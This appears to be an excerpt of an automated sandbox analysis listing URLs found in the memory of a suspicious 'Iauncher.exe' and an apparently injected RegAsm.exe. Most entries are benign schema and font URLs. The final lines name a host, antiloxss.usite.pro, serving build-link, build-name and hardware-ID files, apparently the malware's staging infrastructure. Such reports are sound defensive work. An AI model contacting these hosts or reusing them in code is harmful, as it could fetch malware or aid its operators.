Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/D
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: RegAsm.exe, 00000004.00000002.1979402537.000000000284F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: RegAsm.exe, 00000004.00000002.1979402537.000000000284F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: RegAsm.exe, 00000004.00000002.1979402537.000000000284F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3ResponseD
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: Iauncher.exe, 00000000.00000002.3509420380.00000000028EA000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3508288083.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vimeo.com/api/v2/video/
Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Iauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Iauncher.exe, 00000000.00000002.3509420380.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3509420380.00000000029C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://antiloxss.usite.pro
Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildLink.txtd
Source: Iauncher.exe, 00000000.00000002.3509420380.00000000029F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildLink.txtt-
Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildName.txtd
Source: Iauncher.exe, 00000000.00000002.3509420380.00000000029F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildName.txtt-
Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildZipName.txtd
Source: Iauncher.exe, 00000000.00000002.3509420380.00000000029F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildZipName.txtt-
Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/hwids.txt
Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/hwids.txtd
